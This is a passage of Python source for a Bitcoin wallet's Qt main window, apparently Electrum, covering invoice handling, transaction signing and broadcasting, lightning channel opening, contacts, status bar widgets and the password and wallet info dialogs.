        invoice = LNInvoice.from_bech32(invoice_str)
        if invoice.get_amount_msat() is None:
            # amountless invoice: take the amount from the amount field
            amount_sat = self.amount_e.get_amount()
            if amount_sat:
                amount_sat = int(amount_sat)
                invoice.amount_msat = int(amount_sat * 1000)
            else:
                self.show_error(_('No amount'))
                return
        return invoice
    else:
        outputs = self.read_outputs()
        if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
            return
        message = self.message_e.text()
        return self.wallet.create_invoice(
            outputs=outputs,
            message=message,
            pr=self.payment_request,
            URI=self.payto_URI)
def do_save_invoice(self):
    """Read the invoice from the send tab and persist it."""
    self.pending_invoice = self.read_invoice()
    if self.pending_invoice:
        self.save_pending_invoice()
def save_pending_invoice(self):
    """Persist self.pending_invoice (if any), clearing the send tab first."""
    invoice = self.pending_invoice
    if not invoice:
        return
    self.do_clear()
    self.wallet.save_invoice(invoice)
    self.invoice_list.update()
    self.pending_invoice = None
def do_pay(self):
    """Read the invoice from the send tab and start paying it."""
    self.pending_invoice = self.read_invoice()
    if self.pending_invoice:
        self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
    """Pay several on-chain invoices in a single transaction."""
    outputs = [o for invoice in invoices for o in invoice.outputs]
    self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
    """Dispatch payment of *invoice* by its type (lightning vs on-chain)."""
    if invoice.type == PR_TYPE_LN:
        assert isinstance(invoice, LNInvoice)
        self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
    elif invoice.type == PR_TYPE_ONCHAIN:
        assert isinstance(invoice, OnchainInvoice)
        self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
    else:
        raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
    """Coins to spend: the manual UTXO selection if one is active,
    otherwise every spendable coin in the wallet."""
    manual = self.get_manually_selected_coins()
    if manual is not None:
        return manual
    return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
    """Return a list of selected coins or None.
    Note: None means selection is not being used,
    while an empty sequence means the user specifically selected that.
    """
    # the utxo list widget owns the selection state
    return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
    """Error text for insufficient funds, mentioning frozen balance if any."""
    msg = _("Not enough funds")
    frozen_total = sum(self.wallet.get_frozen_balance())
    if frozen_total:
        frozen_str = self.format_amount(frozen_total).strip()
        msg += " ({} {} {})".format(frozen_str, self.base_unit(), _("are frozen"))
    return msg
def pay_onchain_dialog(
        self, inputs: Sequence[PartialTxInput],
        outputs: List[PartialTxOutput], *,
        external_keypairs=None) -> None:
    """Show the confirm-transaction dialog and, on confirmation, sign and
    broadcast. *external_keypairs* is set when sweeping foreign keys."""
    # trustedcoin requires this
    if run_hook('abort_send', self):
        return
    is_sweep = bool(external_keypairs)
    make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
        coins=inputs,
        outputs=outputs,
        fee=fee_est,
        is_sweep=is_sweep)
    output_values = [x.value for x in outputs]
    # '!' marks a spend-max output; at most one is allowed
    if output_values.count('!') > 1:
        self.show_error(_("More than one output set to spend max"))
        return
    output_value = '!' if '!' in output_values else sum(output_values)
    d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
    if d.not_enough_funds:
        # Check if we had enough funds excluding fees,
        # if so, still provide opportunity to set lower fees.
        if not d.have_enough_funds_assuming_zero_fees():
            text = self.get_text_not_enough_funds_mentioning_frozen()
            self.show_message(text)
            return
    # shortcut to advanced preview (after "enough funds" check!)
    if self.config.get('advanced_preview'):
        self.preview_tx_dialog(make_tx=make_tx,
                               external_keypairs=external_keypairs)
        return
    cancelled, is_send, password, tx = d.run()
    if cancelled:
        return
    if is_send:
        self.save_pending_invoice()
        def sign_done(success):
            if success:
                self.broadcast_or_show(tx)
        self.sign_tx_with_password(tx, callback=sign_done, password=password,
                                   external_keypairs=external_keypairs)
    else:
        # user chose "preview" instead of sending
        self.preview_tx_dialog(make_tx=make_tx,
                               external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
    """Open the advanced transaction-preview dialog."""
    PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
                    window=self).show()
def broadcast_or_show(self, tx: Transaction):
    """Broadcast *tx* when it is complete and we are online; otherwise
    fall back to showing the transaction dialog."""
    if not tx.is_complete():
        self.show_transaction(tx)
        return
    if self.network:
        self.broadcast_transaction(tx)
    else:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        self.show_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
    """Password-prompting wrapper (via @protected) around sign_tx_with_password."""
    self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
    '''Sign the transaction in a separate thread. When done, calls
    the callback with a success code of True or False.
    '''
    def on_success(result):
        callback(True)
    def on_failure(exc_info):
        self.on_error(exc_info)
        callback(False)
    # plugins (e.g. trustedcoin) may wrap the success handler
    on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
    if external_keypairs:
        # can sign directly
        task = partial(tx.sign, external_keypairs)
    else:
        task = partial(self.wallet.sign_transaction, tx, password)
    msg = _('Signing transaction...')
    WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
    """Broadcast *tx* on a background thread and report the result in the GUI.

    When a payment request is pending, also sends the payment message to
    the merchant and waits (up to 20s) for the acknowledgement.
    """
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Invoice has expired")
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            return False, e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            return False, repr(e)
        # success
        txid = tx.txid()
        if pr:
            self.payment_request = None
            refund_address = self.wallet.get_receiving_address()
            coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            ack_status, ack_msg = fut.result(timeout=20)
            self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
        return True, txid
    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
    def broadcast_done(result):
        # GUI thread
        if result:
            success, msg = result
            if success:
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
            else:
                msg = msg or ''
                parent.show_error(msg)
    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
    """Return a make_tx(fee_est) closure that builds the channel-funding tx."""
    coins = self.get_coins(nonlocal_only=True)
    def make_tx(fee_est):
        return self.wallet.lnworker.mktx_for_open_channel(
            coins=coins,
            funding_sat=funding_sat,
            fee_est=fee_est)
    return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
    """Open a lightning channel to the node in *connect_str*, funding it
    with *funding_sat* sats (and optionally pushing *push_amt* sats)."""
    try:
        extract_nodeid(connect_str)
    except ConnStringFormatError as e:
        self.show_error(str(e))
        return
    # use ConfirmTxDialog
    # we need to know the fee before we broadcast, because the txid is required
    make_tx = self.mktx_for_open_channel(funding_sat)
    d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
    # disable preview button because the user must not broadcast tx before establishment_flow
    d.preview_button.setEnabled(False)
    cancelled, is_send, password, funding_tx = d.run()
    if not is_send:
        return
    if cancelled:
        return
    # read funding_sat from tx; converts '!' to int value
    funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
    def task():
        # runs off the GUI thread via WaitingDialog
        return self.wallet.lnworker.open_channel(connect_str=connect_str,
                                                 funding_tx=funding_tx,
                                                 funding_sat=funding_sat,
                                                 push_amt_sat=push_amt,
                                                 password=password)
    def on_success(args):
        chan, funding_tx = args
        n = chan.constraints.funding_txn_minimum_depth
        message = '\n'.join([
            _('Channel established.'),
            _('Remote peer ID') + ':' + chan.node_id.hex(),
            _('This channel will be usable after {} confirmations').format(n)
        ])
        if not funding_tx.is_complete():
            message += '\n\n' + _('Please sign and broadcast the funding transaction')
        self.show_message(message)
        if not funding_tx.is_complete():
            self.show_transaction(funding_tx)
    def on_failure(exc_info):
        type_, e, traceback = exc_info
        self.show_error(_('Could not open channel: {}').format(repr(e)))
    WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
    """Modal single-choice dialog; return the selected index, or None on cancel."""
    # Needed by QtHandler for hardware wallets
    dlg = WindowModalDialog(self.top_level_window())
    choices_layout = ChoicesLayout(msg, choices)
    box = QVBoxLayout(dlg)
    box.addLayout(choices_layout.layout())
    box.addLayout(Buttons(OkButton(dlg)))
    return choices_layout.selected_index() if dlg.exec_() else None
def lock_amount(self, b: bool) -> None:
    """Freeze/unfreeze the amount field; the max button only works when unlocked."""
    self.amount_e.setFrozen(b)
    self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
    """Switch to the send tab and lock its fields while a payment request loads."""
    self.show_send_tab()
    self.payto_e.is_pr = True
    self.payto_e.setFrozen(True)
    self.message_e.setFrozen(True)
    self.lock_amount(True)
    # placeholder until on_pr() fills in the real request data
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoices(self, keys):
    """Remove the given invoice keys from the wallet and refresh the list view."""
    for invoice_key in keys:
        self.wallet.delete_invoice(invoice_key)
    self.invoice_list.update()
def payment_request_ok(self):
    """Fill the send tab from a successfully verified payment request."""
    req = self.payment_request
    if not req:
        return
    invoice = self.wallet.get_invoice(req.get_id())
    if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
        self.show_message("invoice already paid")
        self.do_clear()
        self.payment_request = None
        return
    self.payto_e.is_pr = True
    # color the payto field by expiry state
    if req.has_expired():
        self.payto_e.setExpired()
    else:
        self.payto_e.setGreen()
    self.payto_e.setText(req.get_requestor())
    self.amount_e.setAmount(req.get_amount())
    self.message_e.setText(req.get_memo())
    # signal to set fee
    self.amount_e.textEdited.emit("")
def payment_request_error(self):
    """Show the failed payment request's error and reset the send tab."""
    req = self.payment_request
    if not req:
        return
    self.show_message(req.error)
    self.payment_request = None
    self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
    """Callback for a fetched BIP70 payment request; dispatches to the GUI
    thread via the ok/error signals after verification."""
    self.set_onchain(True)
    self.payment_request = request
    verified = self.payment_request.verify(self.contacts)
    if verified:
        self.payment_request_ok_signal.emit()
    else:
        self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
    """Parse ln invoice, and prepare the send tab for it."""
    try:
        lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
    except Exception as e:
        raise LnDecodeException(e) from e
    pubkey = bh2u(lnaddr.pubkey.serialize())
    # 'd' tag carries the human-readable description, if present
    description = next((v for k, v in lnaddr.tags if k == 'd'), '')
    self.payto_e.setFrozen(True)
    self.payto_e.setText(pubkey)
    self.message_e.setText(description)
    amount_sat = lnaddr.get_amount_sat()
    if amount_sat is not None:
        self.amount_e.setAmount(amount_sat)
    self.set_onchain(False)
def set_onchain(self, b):
    """Record whether the send tab is in on-chain mode; 'max' only applies on-chain."""
    self._is_onchain = b
    self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
    """Populate the send tab from a BIP21 URI (may trigger an async BIP70 fetch)."""
    if not URI:
        return
    try:
        parsed = util.parse_URI(URI, self.on_pr)
    except InvalidBitcoinURI as e:
        self.show_error(_("Error parsing URI") + f":\n{e}")
        return
    self.show_send_tab()
    self.payto_URI = parsed
    # an 'r' (request URL) or a signed request means BIP70: fetch asynchronously
    if parsed.get('r') or (parsed.get('name') and parsed.get('sig')):
        self.prepare_for_payment_request()
        return
    address = parsed.get('address')
    amount = parsed.get('amount')
    # use label as description (not BIP21 compliant)
    message = parsed.get('message') or parsed.get('label')
    if address:
        self.payto_e.setText(address)
    if message:
        self.message_e.setText(message)
    if amount:
        self.amount_e.setAmount(amount)
        self.amount_e.textEdited.emit("")
def do_clear(self):
    """Reset the send tab to its pristine state."""
    self.max_button.setChecked(False)
    self.payment_request = None
    self.payto_URI = None
    self.payto_e.is_pr = False
    self.set_onchain(False)
    for field in (self.payto_e, self.message_e, self.amount_e):
        field.setText('')
        field.setFrozen(False)
    self.update_status()
    run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
    """(Un)freeze whole addresses and refresh the affected list views."""
    self.wallet.set_frozen_state_of_addresses(addrs, freeze)
    self.address_list.update()
    self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
    """(Un)freeze individual coins, identified by their prevout string."""
    prevouts = {u.prevout.to_str() for u in utxos}
    self.wallet.set_frozen_state_of_coins(prevouts, freeze)
    self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
    """Wrap a searchable list widget (plus optional toolbar) in a tab container."""
    tab = QWidget()
    # do_search() looks for this attribute on the current tab
    tab.searchable_list = l
    layout = QVBoxLayout()
    tab.setLayout(layout)
    if toolbar:
        layout.addLayout(toolbar)
    layout.addWidget(l)
    return tab
def create_addresses_tab(self):
    """Build the Addresses tab with its (configurable) toolbar."""
    from .address_list import AddressList
    self.address_list = addr_list = AddressList(self)
    toolbar = addr_list.create_toolbar(self.config)
    addr_list.show_toolbar(bool(self.config.get('show_toolbar_addresses', False)))
    return self.create_list_tab(addr_list, toolbar)
def create_utxo_tab(self):
    """Build the Coins (UTXO) tab."""
    from .utxo_list import UTXOList
    self.utxo_list = UTXOList(self)
    return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
    """Build the Contacts tab."""
    from .contact_list import ContactList
    self.contact_list = ContactList(self)
    return self.create_list_tab(self.contact_list)
def remove_address(self, addr):
    """Ask for confirmation, then delete *addr* from the wallet."""
    if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
        return
    try:
        self.wallet.delete_address(addr)
    except UserFacingException as e:
        self.show_error(str(e))
        return
    self.need_update.set()  # history, addresses, coins
    self.clear_receive_tab()
def paytomany(self):
    """Switch the send tab into multi-output mode and explain the format."""
    self.show_send_tab()
    self.payto_e.paytomany()
    instructions = (
        _('Enter a list of outputs in the \'Pay to\' field.'),
        _('One output per line.'),
        _('Format: address, amount'),
        _('You may load a CSV file using the file icon.'),
    )
    self.show_message('\n'.join(instructions), title=_('Pay to many'))
def payto_contacts(self, labels):
    """Prefill the send tab with the given contacts' payto strings."""
    paytos = [self.get_contact_payto(label) for label in labels]
    self.show_send_tab()
    if len(paytos) == 1:
        self.payto_e.setText(paytos[0])
        self.amount_e.setFocus()
        return
    # multiple recipients: one "payto, 0" line each, amounts to be edited
    self.payto_e.setText("\n".join(p + ", 0" for p in paytos))
    self.payto_e.setFocus()
def set_contact(self, label, address):
    """Add or rename a contact; return True on success, False on a bad address."""
    if not is_address(address):
        self.show_error(_('Invalid Address'))
        self.contact_list.update()  # Displays original unchanged value
        return False
    self.contacts[address] = ('address', label)
    self.contact_list.update()
    self.history_list.update()
    self.update_completions()
    return True
def delete_contacts(self, labels):
    """After confirmation, remove the given contact keys and refresh views."""
    prompt = _("Remove {} from your list of contacts?").format(" + ".join(labels))
    if not self.question(prompt):
        return
    for key in labels:
        self.contacts.pop(key)
    self.history_list.update()
    self.contact_list.update()
    self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
    """Show a modal dialog with the details of an on-chain invoice.

    For BIP70 invoices the requestor/signature status is displayed and the
    raw payment request can be exported to a ``*.bip70`` file.
    """
    amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
    d = WindowModalDialog(self, _("Onchain Invoice"))
    vbox = QVBoxLayout(d)
    grid = QGridLayout()
    grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
    grid.addWidget(QLabel(amount_str), 1, 1)
    if len(invoice.outputs) == 1:
        grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
        grid.addWidget(QLabel(invoice.get_address()), 2, 1)
    else:
        # one "address : amount" line per output
        outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
        grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
        grid.addWidget(QLabel(outputs_str), 2, 1)
    grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
    grid.addWidget(QLabel(invoice.message), 3, 1)
    if invoice.exp:
        grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
        grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
    if invoice.bip70:
        pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
        # verify() populates the status shown by get_verify_status() below
        pr.verify(self.contacts)
        grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
        grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
        grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
        grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
        def do_export():
            # save the raw BIP70 payment request to a user-chosen file
            key = pr.get_id()
            name = str(key) + '.bip70'
            fn = getSaveFileName(
                parent=self,
                title=_("Save invoice to file"),
                filename=name,
                filter="*.bip70",
                config=self.config,
            )
            if not fn:
                return
            with open(fn, 'wb') as f:
                # fix: the return value of write() was assigned to an unused
                # local; just write.
                f.write(pr.raw)
            self.show_message(_('BIP70 invoice saved as {}').format(fn))
        exportButton = EnterButton(_('Export'), do_export)
        buttons = Buttons(exportButton, CloseButton(d))
    else:
        buttons = Buttons(CloseButton(d))
    vbox.addLayout(grid)
    vbox.addLayout(buttons)
    d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
    """Show a modal dialog with the details of a lightning (BOLT11) invoice."""
    lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
    d = WindowModalDialog(self, _("Lightning Invoice"))
    vbox = QVBoxLayout(d)
    grid = QGridLayout()
    grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
    grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
    grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
    amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
    grid.addWidget(QLabel(amount_str), 1, 1)
    grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
    grid.addWidget(QLabel(invoice.message), 2, 1)
    grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
    payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
    payhash_e.addCopyButton(self.app)
    payhash_e.setReadOnly(True)
    # fix: the widget was previously added to both vbox and grid; a widget can
    # only belong to one layout, and the grid cell is the intended placement.
    grid.addWidget(payhash_e, 3, 1)
    if invoice.exp:
        grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
        grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
    vbox.addLayout(grid)
    invoice_e = ShowQRTextEdit(config=self.config)
    invoice_e.addCopyButton(self.app)
    invoice_e.setText(invoice.invoice)
    vbox.addWidget(invoice_e)
    vbox.addLayout(Buttons(CloseButton(d),))
    d.exec_()
def create_console_tab(self):
    """Instantiate the Python console widget for the Console tab."""
    from .console import Console
    self.console = Console()
    return self.console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
    """Build the main window status bar: balance label, hidden search box,
    update-notice button, and password/preferences/seed plus optional
    lightning/network buttons (insertion order defines on-screen order)."""
    sb = QStatusBar()
    sb.setFixedHeight(35)
    self.balance_label = QLabel("Loading wallet...")
    self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
    self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
    sb.addWidget(self.balance_label)
    self.search_box = QLineEdit()
    self.search_box.textChanged.connect(self.do_search)
    self.search_box.hide()  # shown on demand by toggle_search()
    sb.addPermanentWidget(self.search_box)
    # update notification button; hidden until an update check sets it up
    self.update_check_button = QPushButton("")
    self.update_check_button.setFlat(True)
    self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
    self.update_check_button.setIcon(read_QIcon("update.png"))
    self.update_check_button.hide()
    sb.addPermanentWidget(self.update_check_button)
    self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
    sb.addPermanentWidget(self.password_button)
    sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
    self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
    sb.addPermanentWidget(self.seed_button)
    # lightning/network buttons only exist when applicable; other code checks
    # these attributes for None before using them
    self.lightning_button = None
    if self.wallet.has_lightning() and self.network:
        self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
        self.update_lightning_icon()
        sb.addPermanentWidget(self.lightning_button)
    self.status_button = None
    if self.network:
        self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
        sb.addPermanentWidget(self.status_button)
    run_hook('create_status_bar', sb)
    self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
    """Build the (initially hidden) coin-control status bar."""
    self.coincontrol_sb = sb = QStatusBar()
    sb.setSizeGripEnabled(False)
    sb.setStyleSheet('QStatusBar::item {border: None;} '
                     + ColorScheme.GREEN.as_stylesheet(True))
    label = QLabel()
    label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
    label.setTextInteractionFlags(Qt.TextSelectableByMouse)
    self.coincontrol_label = label
    sb.addWidget(label)
    reset_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
    reset_button.setStyleSheet("margin-right: 5px;")
    sb.addPermanentWidget(reset_button)
    sb.setVisible(False)
    return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
    """Show *msg* in the coin-control bar, or hide the bar when msg is empty."""
    if not msg:
        self.coincontrol_label.setText("")
        self.coincontrol_sb.setVisible(False)
    else:
        self.coincontrol_label.setText(msg)
        self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
    """Refresh the lightning status-bar button from lngossip sync progress."""
    if self.lightning_button is None or self.network.lngossip is None:
        return
    # display colorful lightning icon to signal connection
    self.lightning_button.setIcon(read_QIcon("lightning.png"))
    cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
    progress_str = "??%" if progress_percent is None else f"{progress_percent}%"
    if progress_percent and progress_percent >= 100:
        self.lightning_button.setMaximumWidth(25)
        self.lightning_button.setText('')
        self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
    else:
        self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
        self.lightning_button.setText(progress_str)
        self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
                                           "Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
    """Show a locked/unlocked padlock depending on whether a password is set."""
    icon_name = "lock.png" if self.wallet.has_password() else "unlock.png"
    self.password_button.setIcon(read_QIcon(icon_name))
def update_buttons_on_seed(self):
    """Seed/password buttons are only visible when the wallet supports them."""
    self.seed_button.setVisible(self.wallet.has_seed())
    self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
    """Change (set/unset) the wallet password.

    For storage encrypted with an xpub-derived key (hardware wallets), the
    device supplies the encryption password; otherwise the user enters
    old/new passwords in a software dialog.
    """
    from electrum.storage import StorageEncryptionVersion
    if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
        from .password_dialog import ChangePasswordDialogForHW
        d = ChangePasswordDialogForHW(self, self.wallet)
        ok, encrypt_file = d.run()
        if not ok:
            return
        try:
            # derived from the hw device; may prompt on-device and can be cancelled
            hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
        except UserCancelled:
            return
        except BaseException as e:
            self.logger.exception('')
            self.show_error(repr(e))
            return
        # old password only applies if there was one; new only if still encrypting
        old_password = hw_dev_pw if self.wallet.has_password() else None
        new_password = hw_dev_pw if encrypt_file else None
    else:
        from .password_dialog import ChangePasswordDialogForSW
        d = ChangePasswordDialogForSW(self, self.wallet)
        ok, old_password, new_password, encrypt_file = d.run()
        if not ok:
            return
    try:
        self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
    except InvalidPassword as e:
        self.show_error(str(e))
        return
    except BaseException:
        self.logger.exception('Failed to update password')
        self.show_error(_('Failed to update password'))
        return
    msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
    self.show_message(msg, title=_("Success"))
    self.update_lock_icon()
def toggle_search(self):
    """Show/hide the status-bar search box; clear the filter when hiding."""
    was_hidden = self.search_box.isHidden()
    self.search_box.setHidden(not was_hidden)
    if was_hidden:
        # just shown: give it keyboard focus (1 == Qt.TabFocusReason)
        self.search_box.setFocus(1)
    else:
        self.do_search('')
def do_search(self, t):
    """Apply filter text *t* to the current tab's searchable list, if it has one."""
    current_tab = self.tabs.currentWidget()
    searchable = getattr(current_tab, 'searchable_list', None)
    if searchable is not None:
        searchable.filter(t)
def new_contact_dialog(self):
    """Modal dialog asking for a new contact's address and name."""
    dlg = WindowModalDialog(self, _("New Contact"))
    vbox = QVBoxLayout(dlg)
    vbox.addWidget(QLabel(_('New Contact') + ':'))
    grid = QGridLayout()
    addr_edit = QLineEdit()
    addr_edit.setFixedWidth(32 * char_width_in_lineedit())
    name_edit = QLineEdit()
    name_edit.setFixedWidth(32 * char_width_in_lineedit())
    grid.addWidget(QLabel(_("Address")), 1, 0)
    grid.addWidget(addr_edit, 1, 1)
    grid.addWidget(QLabel(_("Name")), 2, 0)
    grid.addWidget(name_edit, 2, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(dlg), OkButton(dlg)))
    if dlg.exec_():
        # set_contact(label, address)
        self.set_contact(name_edit.text(), addr_edit.text())
def show_wallet_info(self):
    """Modal dialog summarizing the wallet: type, script type, seed/keystore
    info, lightning availability, and (for deterministic wallets) the master
    public key(s) with derivation paths."""
    dialog = WindowModalDialog(self, _("Wallet Information"))
    dialog.setMinimumSize(500, 100)
    vbox = QVBoxLayout()
    wallet_type = self.wallet.db.get('wallet_type', '')
    if self.wallet.is_watching_only():
        wallet_type += ' [{}]'.format(_('watching-only'))
    seed_available = _('True') if self.wallet.has_seed() else _('False')
    keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
    grid = QGridLayout()
    basename = os.path.basename(self.wallet.storage.path)
    grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
    grid.addWidget(QLabel(basename), 0, 1)
    grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
    grid.addWidget(QLabel(wallet_type), 1, 1)
    grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
    grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
    grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
    grid.addWidget(QLabel(str(seed_available)), 3, 1)
    # single keystore: show its type inline; multisig cosigners are listed below
    if len(keystore_types) <= 1:
        grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
        ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
        grid.addWidget(QLabel(ks_type), 4, 1)
    # lightning
    grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
    if self.wallet.can_have_lightning():
        grid.addWidget(QLabel(_('Enabled')), 5, 1)
        local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
        local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
        grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
        grid.addWidget(local_nodeid, 6, 1, 1, 3)
    else:
        grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
        grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
    vbox.addLayout(grid)
    labels_clayout = None
    if self.wallet.is_deterministic():
        keystores = self.wallet.get_keystores()
        # one stacked page per keystore; the combobox below switches pages
        ks_stack = QStackedWidget()
        def select_ks(index):
            ks_stack.setCurrentIndex(index)
        # only show the combobox in case multiple accounts are available
        if len(keystores) > 1:
            def label(idx, ks):
                if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
                    return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
                else:
                    return _("keystore") + f' {idx+1}'
            labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
            on_click = lambda clayout: select_ks(clayout.selected_index())
            labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
            vbox.addLayout(labels_clayout.layout())
        for ks in keystores:
            ks_w = QWidget()
            ks_vbox = QVBoxLayout()
            ks_vbox.setContentsMargins(0, 0, 0, 0)
